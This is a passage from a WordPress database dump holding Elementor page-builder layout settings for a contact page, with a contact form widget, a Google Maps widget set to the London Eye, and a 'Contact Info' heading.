bile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"animation\":\"\",\"animation_duration\":\"\",\"css_classes\":\"\",\"_section_responsive\":\"\",\"reverse_order_mobile\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"hide_desktop\":\"\",\"hide_tablet\":\"\",\"hide_mobile\":\"\",\"section_custom_css\":\"\",\"custom_css\":\"\",\"custom_css_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"qmxghdz\",\"elType\":\"column\",\"settings\":{\"_inline_size\":null,\"_column_size\":100,\"section_style\":\"\",\"background_background\":\"\",\"background_color\":\"\",\"background_image\":{\"url\":\"\",\"id\":\"\"},\"background_position\":\"\",\"background_attachment\":\"\",\"background_repeat\":\"\",\"background_size\":\"\",\"background_video_link\":\"\",\"background_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"border_border\":\"\",\"border_width\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"border_color\":\"\",\"border_radius\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"box_shadow_box_shadow_type\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"heading_color\":\"\",\"color_text\":\"\",\"color_link\":\"\",\"color_link_hover\":\"\",\"text_align\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"animation\":\"\",\"animation_duration\":\"\",\"css_classes\":\"\",\"section_responsive\":\"\",\"screen_sm\":\"default\",\"screen_sm_width\":\"100\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css\":\"\",\"custom_css\":\"\",\"custom_css_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"section_background_overlay\":\"\",\"background_overlay_background\":\"\",\"background_overlay_color\":\"\",\"background_overlay_image\":{\"url\":\"\",\"id\":\"\"},\"background_overlay_position\":\"\",\"background_overlay_attachment\":\"\",\"background_overlay_repeat\":\"\",\"background_overlay_size\":\"\",\"background_overlay_video_link\":\"\",\"background_overlay_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.5}},\"elements\":[{\"id\":\"lofqghi\",\"elType\":\"widget\",\"settings\":{\"section_magzma_contact_form_general_control\":\"\",\"form_select\":\"28\",\"_section_style\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_padding_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_padding_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_animation\":\"\",\"animation_duration\":\"\",\"_css_classes\":\"\",\"_section_background\":\"\",\"_background_background\":\"\",\"_background_color\":\"\",\"_background_image\":{\"url\":\"\",\"id\":\"\"},\"_background_position\":\"\",\"_background_attachment\":\"\",\"_background_repeat\":\"\",\"_background_size\":\"\",\"_background_video_link\":\"\",\"_background_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"_border_border\":\"\",\"_border_width\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_border_color\":\"\",\"_border_radius\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_box_shadow_box_shadow_type\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"hide_desktop\":\"\",\"hide_tablet\":\"\",\"hide_mobile\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-contact-form\"}],\"isInner\":false}],\"isInner\":false}]'),(496,361,'_elementor_version','0.4'),(497,362,'_elementor_template_type','page'),(498,362,'_elementor_edit_mode','builder'),(499,362,'_elementor_data','[{\"id\":\"cojxkpm\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"stretch_section\":\"section-stretched\",\"layout\":\"full_width\",\"content_width\":{\"unit\":\"px\",\"size\":\"\"},\"gap\":\"no\",\"height\":\"default\",\"custom_height\":{\"unit\":\"px\",\"size\":400},\"column_position\":\"middle\",\"content_position\":\"\",\"structure\":\"10\",\"sticky_element\":\"\",\"section_background\":\"\",\"background_background\":\"\",\"background_color\":\"\",\"background_image\":{\"url\":\"\",\"id\":\"\"},\"background_position\":\"\",\"background_attachment\":\"\",\"background_repeat\":\"\",\"background_size\":\"\",\"background_video_link\":\"\",\"background_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"background_overlay_section\":\"\",\"background_overlay_background\":\"\",\"background_overlay_color\":\"\",\"background_overlay_image\":{\"url\":\"\",\"id\":\"\"},\"background_overlay_position\":\"\",\"background_overlay_attachment\":\"\",\"background_overlay_repeat\":\"\",\"background_overlay_size\":\"\",\"background_overlay_video_link\":\"\",\"background_overlay_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.5},\"section_border\":\"\",\"border_border\":\"\",\"border_width\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"border_color\":\"\",\"border_radius\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"box_shadow_box_shadow_type\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"heading_color\":\"\",\"color_text\":\"\",\"color_link\":\"\",\"color_link_hover\":\"\",\"text_align\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"animation\":\"\",\"animation_duration\":\"\",\"css_classes\":\"\",\"_section_responsive\":\"\",\"reverse_order_mobile\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"hide_desktop\":\"\",\"hide_tablet\":\"\",\"hide_mobile\":\"\",\"section_custom_css\":\"\",\"custom_css\":\"\",\"custom_css_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"brnihcq\",\"elType\":\"column\",\"settings\":{\"_inline_size\":null,\"_column_size\":100,\"section_style\":\"\",\"background_background\":\"\",\"background_color\":\"\",\"background_image\":{\"url\":\"\",\"id\":\"\"},\"background_position\":\"\",\"background_attachment\":\"\",\"background_repeat\":\"\",\"background_size\":\"\",\"background_video_link\":\"\",\"background_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"border_border\":\"\",\"border_width\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"border_color\":\"\",\"border_radius\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"box_shadow_box_shadow_type\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"heading_color\":\"\",\"color_text\":\"\",\"color_link\":\"\",\"color_link_hover\":\"\",\"text_align\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"animation\":\"\",\"animation_duration\":\"\",\"css_classes\":\"\",\"section_responsive\":\"\",\"screen_sm\":\"default\",\"screen_sm_width\":\"100\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css\":\"\",\"custom_css\":\"\",\"custom_css_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"background_overlay_image\":null,\"background_overlay_video_fallback\":null,\"section_background_overlay\":\"\",\"background_overlay_background\":\"\",\"background_overlay_color\":\"\",\"background_overlay_position\":\"\",\"background_overlay_attachment\":\"\",\"background_overlay_repeat\":\"\",\"background_overlay_size\":\"\",\"background_overlay_video_link\":\"\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.5}},\"elements\":[{\"id\":\"fehojou\",\"elType\":\"widget\",\"settings\":{\"section_map\":\"\",\"address\":\"London Eye, London, United Kingdom\",\"zoom\":{\"unit\":\"px\",\"size\":10},\"height\":{\"unit\":\"px\",\"size\":\"450\"},\"prevent_scroll\":\"yes\",\"view\":\"traditional\",\"_section_style\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_padding_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_padding_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_animation\":\"\",\"animation_duration\":\"\",\"_css_classes\":\"\",\"_section_background\":\"\",\"_background_background\":\"\",\"_background_color\":\"\",\"_background_image\":{\"url\":\"\",\"id\":\"\"},\"_background_position\":\"\",\"_background_attachment\":\"\",\"_background_repeat\":\"\",\"_background_size\":\"\",\"_background_video_link\":\"\",\"_background_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"_border_border\":\"\",\"_border_width\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_border_color\":\"\",\"_border_radius\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_box_shadow_box_shadow_type\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"hide_desktop\":\"\",\"hide_tablet\":\"\",\"hide_mobile\":\"\",\"section_custom_css\":\"\",\"custom_css\":\"\",\"custom_css_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"google_maps\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"hlvipbb\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"stretch_section\":\"\",\"layout\":\"boxed\",\"content_width\":{\"unit\":\"px\",\"size\":\"1170\"},\"gap\":\"no\",\"height\":\"default\",\"custom_height\":{\"unit\":\"px\",\"size\":400},\"column_position\":\"middle\",\"content_position\":\"\",\"structure\":\"20\",\"sticky_element\":\"\",\"section_background\":\"\",\"background_background\":\"\",\"background_color\":\"\",\"background_image\":{\"url\":\"\",\"id\":\"\"},\"background_position\":\"\",\"background_attachment\":\"\",\"background_repeat\":\"\",\"background_size\":\"\",\"background_video_link\":\"\",\"background_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"background_overlay_section\":\"\",\"background_overlay_background\":\"\",\"background_overlay_color\":\"\",\"background_overlay_image\":{\"url\":\"\",\"id\":\"\"},\"background_overlay_position\":\"\",\"background_overlay_attachment\":\"\",\"background_overlay_repeat\":\"\",\"background_overlay_size\":\"\",\"background_overlay_video_link\":\"\",\"background_overlay_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.5},\"section_border\":\"\",\"border_border\":\"\",\"border_width\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"border_color\":\"\",\"border_radius\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"box_shadow_box_shadow_type\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"heading_color\":\"\",\"color_text\":\"\",\"color_link\":\"\",\"color_link_hover\":\"\",\"text_align\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"80\",\"right\":0,\"bottom\":\"80\",\"left\":0,\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"animation\":\"\",\"animation_duration\":\"\",\"css_classes\":\"\",\"_section_responsive\":\"\",\"reverse_order_mobile\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"hide_desktop\":\"\",\"hide_tablet\":\"\",\"hide_mobile\":\"\",\"section_custom_css\":\"\",\"custom_css\":\"\",\"custom_css_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"joibcbi\",\"elType\":\"column\",\"settings\":{\"_inline_size\":\"39.982\",\"_column_size\":50,\"section_style\":\"\",\"background_background\":\"\",\"background_color\":\"\",\"background_image\":{\"url\":\"\",\"id\":\"\"},\"background_position\":\"\",\"background_attachment\":\"\",\"background_repeat\":\"\",\"background_size\":\"\",\"background_video_link\":\"\",\"background_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"border_border\":\"\",\"border_width\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"border_color\":\"\",\"border_radius\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"box_shadow_box_shadow_type\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"heading_color\":\"\",\"color_text\":\"\",\"color_link\":\"\",\"color_link_hover\":\"\",\"text_align\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"animation\":\"\",\"animation_duration\":\"\",\"css_classes\":\"\",\"section_responsive\":\"\",\"screen_sm\":\"default\",\"screen_sm_width\":\"100\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css\":\"\",\"custom_css\":\"\",\"custom_css_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"background_overlay_image\":null,\"background_overlay_video_fallback\":null,\"section_background_overlay\":\"\",\"background_overlay_background\":\"\",\"background_overlay_color\":\"\",\"background_overlay_position\":\"\",\"background_overlay_attachment\":\"\",\"background_overlay_repeat\":\"\",\"background_overlay_size\":\"\",\"background_overlay_video_link\":\"\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.5}},\"elements\":[{\"id\":\"qufhoci\",\"elType\":\"widget\",\"settings\":{\"section_magzma_contact_form_general_control\":\"\",\"form_select\":\"28\",\"_section_style\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_padding_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_padding_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_animation\":\"\",\"animation_duration\":\"\",\"_css_classes\":\"\",\"_section_background\":\"\",\"_background_background\":\"\",\"_background_color\":\"\",\"_background_image\":{\"url\":\"\",\"id\":\"\"},\"_background_position\":\"\",\"_background_attachment\":\"\",\"_background_repeat\":\"\",\"_background_size\":\"\",\"_background_video_link\":\"\",\"_background_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"_border_border\":\"\",\"_border_width\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_border_color\":\"\",\"_border_radius\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_box_shadow_box_shadow_type\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"hide_desktop\":\"\",\"hide_tablet\":\"\",\"hide_mobile\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-contact-form\"}],\"isInner\":false},{\"id\":\"kueurih\",\"elType\":\"column\",\"settings\":{\"_inline_size\":\"60.018\",\"_column_size\":50,\"section_style\":\"\",\"background_background\":\"\",\"background_color\":\"\",\"background_image\":{\"url\":\"\",\"id\":\"\"},\"background_position\":\"\",\"background_attachment\":\"\",\"background_repeat\":\"\",\"background_size\":\"\",\"background_video_link\":\"\",\"background_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"border_border\":\"\",\"border_width\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"border_color\":\"\",\"border_radius\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"box_shadow_box_shadow_type\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"heading_color\":\"\",\"color_text\":\"\",\"color_link\":\"\",\"color_link_hover\":\"\",\"text_align\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"50\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"animation\":\"\",\"animation_duration\":\"\",\"css_classes\":\"\",\"section_responsive\":\"\",\"screen_sm\":\"default\",\"screen_sm_width\":\"100\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css\":\"\",\"custom_css\":\"\",\"custom_css_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"background_overlay_image\":null,\"background_overlay_video_fallback\":null,\"section_background_overlay\":\"\",\"background_overlay_background\":\"\",\"background_overlay_color\":\"\",\"background_overlay_position\":\"\",\"background_overlay_attachment\":\"\",\"background_overlay_repeat\":\"\",\"background_overlay_size\":\"\",\"background_overlay_video_link\":\"\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.5}},\"elements\":[{\"id\":\"kfycsca\",\"elType\":\"widget\",\"settings\":{\"section_magzma_head_title\":\"\",\"choose_style\":\"5\",\"the_title\":\"Contact Info\",\"title_size\":\"h3\",\"typography_title_typography\":\"\",\"typography_title_font_size\":{\"unit\":\"px\",\"size\":\"\"},\"typography_title_font_size_tablet\":{\"unit\":\"px\",\"size\":\"\"},\"typography_title_font_size_mobile\":{\"unit\":\"px\",\"size\":\"\"},\"typography_title_font_family\":\"\",\"typography_title_font_weight\":\"\",\"typography_title_text_transform\":\"\",\"typography_title_font_style\":\"\",\"typography_title_line_height\":{\"unit\":\"em\",\"size\":\"\"},\"typography_title_line_height_tablet\":{\"unit\":\"em\",\"size\":\"\"},\"typography_title_line_height_mobile\":{\"unit\":\"em\",\"size\":\"\"},\"typography_title_letter_spacing\":{\"unit\":\"px\",\"size\":\"\"},\"typography_title_letter_spacing_tablet\":{\"unit\":\"px\",\"size\":\"\"},\"typography_title_letter_spacing_mobile\":{\"unit\":\"px\",\"size\":\"\"},\"align\":\"\",\"align_tablet\":\"\",\"align_mobile\":\"\",\"section_magzma_head_title_style\":\"\",\"title_color_1\":\"\",\"section_magzma_head_title_2\":\"\",\"title_color_2\":\"#111111\",\"title_border_color_2\":\"#111111\",\"title_bg_color_2\":\"#ffffff\",\"section_magzma_head_title_3\":\"\",\"title_color_3\":\"#111111\",\"title_border_color_3\":\"#e8e8e8\",\"title_bg_color_3\":\"#ffffff\",\"section_magzma_head_title_4\":\"\",\"title_color_4\":\"#ffffff\",\"title_border_color_4\":\"#111\",\"title_bg_color_4\":\"#111\",\"vertical_position_title_4\":{\"unit\":\"px\",\"size\":0},\"vertical_position_title_4_tablet\":{\"unit\":\"px\",\"size\":0},\"vertical_position_title_4_mobile\":{\"unit\":\"px\",\"size\":0},\"horizontal_position_title_4\":{\"unit\":\"px\",\"size\":0},\"horizontal_position_title_4_tablet\":{\"unit\":\"px\",\"size\":0},\"horizontal_position_title_4_mobile\":{\"unit\":\"px\",\"size\":0},\"section_magzma_head_title_5\":\"\",\"title_color_5\":\"#111111\",\"border_color_5\":\"#e1e1e1\",\"text_border_color_5\":\"#000000\",\"section_magzma_head_title_6\":\"\",\"title_color_6\":\"#111111\",\"border_color_6\":\"#61c436\",\"section_magzma_head_title_7\":\"\",\"title_color_7\":\"#ffffff\",\"wrapper_bg_color_7\":\"#e1e1e1\",\"text_bg_color_7\":\"#61c436\",\"section_magzma_head_title_8\":\"\",\"big_title_8\":\"BIG TITLE\",\"title_color_8\":\"#111111\",\"big_title_color_8\":\"#111111\",\"vertical_position_big_title_8\":{\"unit\":\"%\",\"size\":-65},\"vertical_position_big_title_8_tablet\":{\"unit\":\"%\",\"size\":-65},\"vertical_position_big_title_8_mobile\":{\"unit\":\"%\",\"size\":-65},\"horizontal_position_big_title_8\":{\"unit\":\"%\",\"size\":-2},\"horizontal_position_big_title_8_tablet\":{\"unit\":\"%\",\"size\":-2},\"horizontal_position_big_title_8_mobile\":{\"unit\":\"%\",\"size\":-2},\"typography_big_title_8_typography\":\"\",\"typography_big_title_8_font_size\":{\"unit\":\"px\",\"size\":\"\"},\"typography_big_title_8_font_size_tablet\":{\"unit\":\"px\",\"size\":\"\"},\"typography_big_title_8_font_size_mobile\":{\"unit\":\"px\",\"size\":\"\"},\"typography_big_title_8_font_family\":\"\",\"typography_big_title_8_font_weight\":\"\",\"typography_big_title_8_text_transform\":\"\",\"typography_big_title_8_font_style\":\"\",\"typography_big_title_8_line_height\":{\"unit\":\"em\",\"size\":\"\"},\"typography_big_title_8_line_height_tablet\":{\"unit\":\"em\",\"size\":\"\"},\"typography_big_title_8_line_height_mobile\":{\"unit\":\"em\",\"size\":\"\"},\"typography_big_title_8_letter_spacing\":{\"unit\":\"px\",\"size\":\"\"},\"typography_big_title_8_letter_spacing_tablet\":{\"unit\":\"px\",\"size\":\"\"},\"typography_big_title_8_letter_spacing_mobile\":{\"unit\":\"px\",\"size\":\"\"},\"_section_style\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_padding_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_padding_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\